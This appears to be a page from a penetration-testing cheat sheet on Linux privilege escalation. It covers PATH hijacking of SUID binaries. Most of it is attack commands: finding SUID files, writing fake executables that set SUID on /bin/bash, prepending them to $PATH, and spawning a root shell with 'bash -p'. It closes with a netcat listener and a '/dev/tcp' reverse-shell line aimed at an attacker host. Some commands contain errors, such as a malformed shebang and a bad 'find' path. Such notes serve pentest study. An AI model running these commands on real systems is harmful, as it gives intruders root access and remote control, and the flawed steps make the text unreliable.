Path Hijacking

Some examples to execute SUID files and replace in $PATH

Find some SUID files

find \ -perm -4000 2>/dev/null
touch hijacked_file
chmod 777 hijacked_file

chmod 4755

To give SUID privileges to any file, binary, in this case /bin/bash

echo "#/bin/bash" > hijacked_file
echo "chmod 4755" >> hijacked_file

nano <same_file_name_with_suid>

    #/bin/bash
    chmod 4755 /bin/bash

vim <same_file_name_with_suid>

    #/bin/bash
    chmod 4755 /bin/bash

Add the new path in the actual path

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example/<same_file_name_with_suid>:$PATH # $PATH contain the actual PATH   
echo $PATH
/home/example/<same_file_name_with_suid>:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
echo "****** Execute again the SUID file  *******"

Now just in terminal type

bash -p # To execute bash with the actual privileges

Reverse Shell

In the attack machine we are going to listen to any port

nc -lnvp 443

Now create a file with a connection to the attacker lhost and port 443

echo "/bin/bash -c 'bash -i >& /dev/tcp/<attackerlhost>/443 0>&1'" > <same_file_name_with_suid>

Add the new path in the actual path

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example/<same_file_name_with_suid>:$PATH # $PATH contain the actual PATH   
echo $PATH
/home/example/<same_file_name_with_suid>:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
echo "****** Execute again the SUID file  *******"

PreviousPrivilege Escalation NextCracking

Last updated 9 months ago